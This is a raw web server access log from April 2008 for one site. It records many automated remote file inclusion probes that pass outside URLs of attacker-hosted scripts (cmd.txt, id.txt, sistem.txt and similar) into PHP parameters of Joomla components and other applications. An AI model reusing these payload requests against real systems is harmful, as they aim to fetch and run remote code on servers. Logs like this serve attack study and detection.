64.207.204.13 - - [10/Apr/2008:09:26:35 -0700] "GET /logs/access_080123.log/myevent.php?myevent_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:26:51 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:26:57 -0700] "GET /logs/access_071201.log/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:26:59 -0700] "GET /port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:27:01 -0700] "GET /logs/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:27:13 -0700] "GET /logs/access_071201.log/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:27:14 -0700] "GET /port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:27:16 -0700] "GET /logs/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:27:23 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:27:27 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:27:30 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:09:27:36 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:09:27:36 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:09:27:36 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:27:56 -0700] "GET /logs/access_071201.log/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:28:01 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:28:02 -0700] "GET /port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:28:08 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:28:11 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:28:22 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:28:22 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:28:24 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:28:24 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:28:27 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:28:29 -0700] "GET //index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:28:30 -0700] "GET /logs//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:28:32 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:28:34 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:28:35 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:28:39 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:28:42 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:28:46 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:28:49 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:09:28:49 -0700] "GET /logs/access_080308.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:28:49 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [10/Apr/2008:09:28:50 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/incus/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:28:50 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [10/Apr/2008:09:28:50 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/incus/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [10/Apr/2008:09:28:51 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/incus/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:28:59 -0700] "GET /logs/access_080216.log/main.php?x=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:29:04 -0700] "GET /main.php?x=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:29:07 -0700] "GET /logs/main.php?x=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:29:15 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:29:47 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:30:00 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:30:01 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:30:01 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [10/Apr/2008:09:30:06 -0700] "GET /logs/access_080308.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/incus/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:09:30:16 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:09:30:17 -0700] "GET /phphtml.php?htmlclass_path=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:09:30:17 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.boewe-security.de/galerie//update/data.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:30:18 -0700] "GET /index.php?pagina=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:30:20 -0700] "GET /logs/index.php?pagina=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:30:43 -0700] "GET /logs/access_080207.log/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.92.85.152 - - [10/Apr/2008:09:30:58 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://tare12.nm.ru/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.92.85.152 - - [10/Apr/2008:09:30:58 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://tare12.nm.ru/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.92.85.152 - - [10/Apr/2008:09:30:59 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://tare12.nm.ru/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:31:07 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:31:08 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:31:15 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.221.117.243 - - [10/Apr/2008:09:31:34 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yourbesttype.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.122 - - [10/Apr/2008:09:31:37 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://h1.ripway.com/incus/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [10/Apr/2008:09:31:37 -0700] "GET /phphtml.php?htmlclass_path=http://h1.ripway.com/incus/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [10/Apr/2008:09:31:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://h1.ripway.com/incus/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.85.152 - - [10/Apr/2008:09:31:39 -0700] "GET /logs/access_080213.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://tare12.nm.ru/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:31:39 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:31:42 -0700] "GET //index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:31:42 -0700] "GET /logs//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:31:47 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:31:49 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
220.130.213.205 - - [10/Apr/2008:09:31:51 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:31:53 -0700] "GET /logs/access_080207.log/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:31:56 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.19.144.26 - - [10/Apr/2008:09:32:16 -0700] "GET /logs/access_080207.log/port.php?content=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:32:30 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.245 - - [10/Apr/2008:09:32:37 -0700] "GET /logs//?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 42556 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:32:38 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:32:40 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
66.230.197.245 - - [10/Apr/2008:09:32:41 -0700] "GET //?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:32:50 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:32:51 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:32:51 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:32:52 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:33:08 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:33:08 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:34:07 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:34:07 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:34:28 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:34:28 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:34:31 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:34:36 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:34:36 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.174.160 - - [10/Apr/2008:09:34:39 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://www.unescoulsan.org/bbs//data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.138.166 - - [10/Apr/2008:09:35:06 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://pensacolamicro.com/s0_data/_vti_cnf/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.166 - - [10/Apr/2008:09:35:07 -0700] "GET /logs//citywriter/head.php?path=http://pensacolamicro.com/s0_data/_vti_cnf/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:35:26 -0700] "GET /logs//main.php?sayfa=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:35:28 -0700] "GET //main.php?sayfa=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:35:29 -0700] "GET /logs//main.php?sayfa=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.245.149.70 - - [10/Apr/2008:09:35:30 -0700] "GET //main.php?sayfa=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:09:35:31 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:35:31 -0700] "GET /index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:09:35:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:09:35:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:35:33 -0700] "GET /index.php?pagina1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:35:38 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:35:38 -0700] "GET /logs/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:35:47 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:35:47 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:35:53 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:09:36:02 -0700] "GET /logs/access_080120.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:09:36:02 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:09:36:03 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:36:03 -0700] "GET /logs/access_080131.log/index.php?pagina1=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.178.201 - - [10/Apr/2008:09:36:22 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.52.143.15 - - [10/Apr/2008:09:36:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
